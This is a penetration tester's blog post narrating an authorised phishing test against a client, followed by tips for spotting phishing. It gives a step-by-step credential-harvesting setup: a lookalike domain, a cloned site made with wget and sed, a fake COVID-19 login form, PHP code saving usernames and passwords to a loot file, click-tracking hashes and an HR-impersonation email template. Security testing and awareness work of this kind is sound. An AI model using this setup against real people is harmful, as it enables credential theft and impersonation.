Let’s Go Phishing

One request we get from clients often enough is a phishing campaign request to test their users on this form of Social Engineering. You almost certainly know what a phishing attack is and in this story, I’m going to outline how one of mine was conducted. At the end, I’ll draw up tips on how to keep yourself and your employees safe. I hope you enjoy…

All of the names (people, company and domains) are fake but the scenario is real. Everything I’ve written has, at some point, happened with me personally during an engagement.

The meeting began like most other meetings I’ve been in with this specific customer… Checking in on one another during pandemic times, cracking a few jokes but eventually getting down to business. They wanted to run a phishing campaign against a group of their employees and, since we’ve done a lot of business together already, they came to us as their trusted partner.

“How deep do you want us to go?”, I asked. “Do you want to know who clicked the link or have us steal credentials? Or did you have something else in mind? If you want, we can upgrade this engagement to a Red Team exercise and start owning people.” I finished with a slight laugh.

The main tech person we were dealing with, Sam, replied. “If we can get who clicked the link and steal credentials, that would be good for now. We can always look at a Red Team engagement later on in the year.”

Typing my notes, I continued. “Sure thing. Have you thought about what you want for pretext? We’ve had a lot of success with COVID-19 screening forms. Would that work?”

“We have an app on the users’ phones which does this for us already.”, Sam let on.

“Why not just pretend you’re trying something new? We’ll set up a domain like yours, clone your website and add in a COVID-19 screening form. We can track who clicks the link and then steal credentials when people put them in.”, I offered. There was a brief pause as Sam thought it over before saying:

“That sounds plausible. Can you pretend to be our HR manager, Martin?”, he asked. Although he couldn’t see the smile on my face, I let him know that we could.

“Just to recap, we’re going to spoof your domain, pretend to be Martin and grab creds for a few days?”, I asked.

“You got it.”, Sam confirmed.

I started by looking at their domain name “acme.lab” and thinking of a domain name that may quickly trick the eye of people looking at it. Although this sounds like a noob-level hack, the psychology backs it up. If someone seems “acme” all day long, their brain will eventually look at the first and last letters of the word — If the rest of the letters in the middle are there, regardless of their position, the brain often fills it in. I went to do some domain dorking and came up with the idea of “acrne.lab” as my fake domain. The “r” and “n” characters beside each other in a plain font can look like the letter “m”. I logged into my domain purchasing account and bought the domain. Once it was purchased, I made sure to use the registrar’s function to hide my details and enable the free mail service they offered. One thing I detest doing is configuring a mail server.

Now that I had the domain, I put the workflow together on my whiteboard. To start with, I needed to clone their website. No problem there. Next would be to create a landing area for people who clicked on the link and how to track that first portion. I figured adding a hash in the URL that I could link to the user’s e-mail address would work nicely for that. Last would be capturing username and password information. Again, easy-peasy with a PHP back-end on the web server. I got myself another cup of coffee and started off to work.

Logging into my cloud provider, I spun up an Ubuntu Server machine making sure it had IPv4 and IPv6 access and limited SSH to my static IP addresses on both stacks. I uploaded my SSH key and was off to the races. The first task was to clone their website. To do this, I’d need a web server to host it. I’m most familiar with Apache so running “apt install apache2 php libapache2-mod-php” took care of that for me. I created a custom directory for the site with “mkdir -p /var/www/acrne/acrne.lab” which would be the base for the main site. Going into that directory, I used “wget” to clone the entire website into this directory and changed all HREF tags from “acme.lab” to “acrne.lab” by running “sed -i -e ‘s/acme.lab/acrne.lab/g’ ./*.html” which took care of that. Now, any link clicks on “acrne.lab” would stay on my domain. Lastly, permissions are a big part of security so I changed the ownership to the Ubuntu web server process with “chown www-data.www-data -R /var/www/” and all was set.

You may be wondering why I didn’t post the full “wget” command. Medium performs automatic formatting and putting in CLI switches gets messed up. If you search “wget clone website” there are a lot of articles out there.

I opened up my browser and loaded “hxxp://acrne.lab” which showed me an exact replica of the “acme.lab” website. In my DNS entries with my registrar, I created a new subdomain for “c19.acrne.lab” which would house my landing page. Opening up my shell, I created a new “sites-available” configuration for “c19.acrne.lab” and pointed the “DocumentRoot” to “/var/www/acrne/c19.acrne.lab/”. I copied the entire website into this directory as well, opened the subdomain in my browser and used the “Inspect Element” option to study the layout of the page. By viewing the page this way and having “vim” open in a terminal, I was able to remove the original content and add my own in the middle of a “<div>” tag. Here’s where I created the trap.

After removing superfluous content, I created a small blurb about how Acme Lab requires users to sign in and fill out the C19 questionnaire. I created a login form with the following DOM elements:

• <form action=”survey.php” method=”post”>
• <input type=”text” name=”username”>
• <input type=”password” name=”password”>

This code ensures that the POST elements from the form will be sent to the “survey.php” page once the user submits the form. I finished up my coffee and started to work on the next portion.

I copied the “index.html” page as “survey.php” and removed the login form I built. The first thing I needed to do was capture what was sent in the login form. I added the following lines at the top of the page:

<?php
$myfile = fopen(“/var/log/phishing/loot/acme/loot.txt”, “a”);
fwrite($myfile, “\n\n” . ‘[ ‘ . date(‘d.m.Y’) . “ ] — [ “ . date(Hi) . “hrs ]\n” . $_POST[‘username’] . “ — “ . $_POST[‘password’]);
fclose($myfile);
?>

This would save any information from the previous form to my loot file. Of course, I needed to create the loot file and permissions so I saved and exited back to my shell. Running “mkdir -p /var/log/phishing/loot/acme/ && touch /var/log/phishing/loot/acme/loot.txt” created both the directories and the loot file in one fell swoop. Of course, we had to set permissions as well with “chown www-data.www-data -R /var/log/loot” otherwise the web server wouldn’t be able to put information in the loot file.

“Why not just put the loot file in the web directory?”, you ask.
This loot file will contain usernames and passwords for actual users of a company. We don’t want anyone else to get a hold of that information. That would be bad.

Lastly, I created the actual COVID-19 questionnaire with typical questions like “Have you been outside of the country in the past two weeks?” and some “Yes/No” radio buttons. Since personal information such as this is covered under PIPEDA, the action page for the form didn’t actually save anything regarding a person’s COVID-19 medical status. It just presented them with a thank-you page and redirected them back to “acme.lab” after ten seconds.

Finishing off the last of my cup of coffee, I had to take it out for a spin. The first thing was to run “tail -f /var/log/phishing/acme/loot.txt” while I filled in the form on the “index.html” page. Sure enough, once I submitted the form, anything in the two fields was saved to my loot file. I stopped tailing the loot file and started tailing the “/var/log/apache2/access.log” file and put a new URL in the location bar: “hxxp://c19.acrne.lab/index.html?12345” and hit the [Enter] key to load it. The page loaded properly and the full URL showed up in the log file. “Perfect.”, I whispered to myself.

One last item remained for the website and that was proper HTTPS configuration. Thankfully the Certbot from Let’s Encrypt make this chore a piece of cake. Now my two domains have a valid TLS certificate and will automatically redirect insecure requests to the TLS site. I went to get myself another coffee.

Sitting back down at my desk, I looked at the e-mail signature for Martin which Sam had provided for me. Using a web-based e-mail solution allowed me to use the “Inspect Element” feature of his signature and I copied the CSS into a text editor. I then crafted the e-mail template I would use with the script I wrote for phishing campaigns such as this.

Hello $NAME,
We’re trying a new format of COVID-19 screening and reporting. Please fill out the form <a href=”hxxps://c19.acrne.com/index.html?$HASH”>here</a> and log in with your corporate username and password. You only have to do this once and we will be collecting feedback after the experience.
Thank-you,
Martin
<!- CSS inline goes here ->
123 Candycane Ln.
North Pole, H0H 0H0
E-mail: <a href=”mailto:martin@acrne.lab”>martin@acme.lab</a>

I always make sure that the “mailto” HREF uses obfuscation so in the event a target doesn’t use the “Reply” feature of their e-mail client and instead uses the e-mail link in the signature, it will come to me. I don’t know if it’s ever happened but if it does, I’ll be ready.

Making my way through my coffee, I logged into the webmail provided by my registrar and update my account settings so that I’m using Martin’s full name and the same signature I’ve used in my template. I send a few test e-mails to myself and reply to them to ensure that they look as close as possible to being legitimate. All’s well on this front. One last piece to test.

In “vim” I create the CSV I’m going to use by putting my own information in there including my name and e-mail address. The script I have created will take the e-mail address and run it through SHA-256 and append that to the URL being sent to the user. This is the “$HASH” variable used in the e-mail template. With the hash in place and showing up in the “access.log” file, I can see who clicked on the link even if they don’t put in their usernames and passwords. Of course there is the possibility that a target sends it to the helpdesk for investigation but the point still stands. I load the CSV into my script and give it a test… A few seconds later, I receive the e-mail and it looks perfect. I finish up my coffee and call it a day.

Friday morning arrives and it’s time to go phishing. I send an e-mail to Sam and let him know that the campaign will launch at ten o’clock unless he stops it. He replies with two words: “Happy hunting!”

Five minutes to ten and I’ve got two terminals open tailing the loot file and the Apache logs. My web browser has my webmail open and I’ve got one terminal loaded up with my custom script just waiting for me to hit the [Enter] key. Ten o’clock rolls around and mission control has cleared us for launch. My stomach is always in knots at this point. In my head, my mind races with thoughts of doubt and insecurity. “What if I’ve missed something? What if they see right through it? What if I screwed up a line in my script?”

With social engineering, it’s live. You only get one shot. If it goes awry, you can’t e-mail the target and ask them to hold tight while you fix something and phish them again. It’s thirty seconds in and I’m already thinking that I should’ve spiked my coffee to calm myself.

But then… It happens. A new line shows up in the “access.log” file. Is it an automated scan? I look at the requested URI and it has a hash at the end of it. This is legit. Someone clicked the link. How far will they go? My eyes are fixated on the terminal tailing the loot file. The cursor blinking in the darkness staring back at me with it’s sole purpose of displaying characters. It’s unending blink. It feels like eternity. But unlike eternity, this silence is broken with the listing of a username and password. They did it. They put in their credentials. My heart is racing as I fist-pump the air; nobody’s around to see it but I don’t care. I feel like Janine Melnitz from Ghostbusters yelling out “We got one!” and hitting the buzzer. But that would be to soon as another line shows up in the Apache log file and a few moments later, another in the loot file.

As much as I am fixated on these two terminals, I know that this is still just the start of the battle and I look at my webmail tab. One new message. Someone replied. A target. Did they catch on? Only one way to find out. I click on the e-mail…

> Hey Martin. Why do we need to do this if we have the app on our phone? This just seems like extra work.
< Hi. We’re just trying this for now. Go back to using your phone and thanks for the feedback.

I hit the [Send] button in the hopes it appeases them and turn my attention back to the two terminals. One more in the loot file. Things are looking good however there’s another reply waiting for me in my webmail.

> What do I use to log in?
< Your computer username and password.

A few seconds later and I see them pop up in the loot file. Things go quiet and I figure now would be a good time to refill my coffee. When I come back to my workstation, there’s yet another e-mail waiting for me.

> I filled it out but did you know our mail server thinks you’re coming from outside our organization? Do you know why that is?
< Thanks for filling it out. I’m not sure why but it started this morning. I’ve opened a ticket with the helpdesk.

My mouth is agape in absolute disbelief… The person saw the header in their e-mail saying that the e-mail being sent was from outside yet they still filled out the form and gave me their credentials. Not only that, instead of phoning or checking in with the real Martin, they used the “Reply” feature so it went back to me. Fantastic!

The rest of the day yields a 63% success rate which is three percent above my average.

“Hey Sam. How was your weekend?”, I ask on the call on Monday.

“Good. How about you?”, he asks back.

“Uneventful, which is nice.”, I say with a chuckle at the end. “Friday was a great day to go phishing, through. We nabbed sixty-three percent of the list you gave us. I’ll send out the report later this week but did you have any feedback on your side?” It’s always good to know what the other thirty-seven percent did — Did they ignore it? Did they check with the helpdesk?

“We had two people bring it to the attention of the helpdesk and that was it.”, he says in a matter-of-fact tone.

“Did you let anyone in on the test?”

“One person, yeah. We had to as he was sending you confidential documents thinking you were the real Martin and wondering why you weren’t replying.”, he laughs.

“Oh. Let me check my webmail…”, I trail off as I load up the webmail application. Sure enough, there are two e-mails of an official nature sitting in inbox. “I’ll delete those right now.” I ensure that the e-mails are deleted and confirm it with him.

“Good, thanks.”, he says. “We’ll get you in to do the Security Awareness training for us soon and you can discuss this in general. ‘Til then.”

And with that, another successful phishing campaign came to a close.

Some people will look at this and say that the attack methodology is very basic and the retort to that is: You’re right.

However, there’s a lot of preparation that goes into a phishing attack. You need to understand some human psychology, how the mind works and how to deflect suspicions away from yourself. You need to have the technological aspect as well for creating the landing site (be it a website or phone number or whatever) and being able to launch the attack in an expeditious manner; launch a phishing attack that takes five hours to reach twenty people and they’ll catch on quickly. A phishing attack focuses on the low-hanging fruit but a threat actor will use these targets to their advantage.

Should this have been a Red Team exercise, I would have had quite a lot of usernames and passwords. I’d give a few to my colleague to set up a distraction for the Blue Team (such as VPN logins followed by port scans) and the rest to compromise different account points of entry (e-mail, VPNs in a few days, remote desktop and remote IaaS connection points). Even if the accounts are reset quickly by the Blue Team, password reuse is another security vulnerability that people succumb to. I’ve seen it and I’ve abused it on engagements — As much as we don’t want it to happen, it does.

Stay safe out there. Phishing can come in via e-mail, SMS, instant message or any other form of communication.

• If it seems suspicious or out of the ordinary, it probably is
• Send it to your helpdesk or SOC to examine
• Never reply to an e-mail or click on links if the e-mail seems suspicious
• Always pay attention to the header on the e-mail that says it was sent from outside your organization
• Verify in person or on the phone with the supposed original sender of the message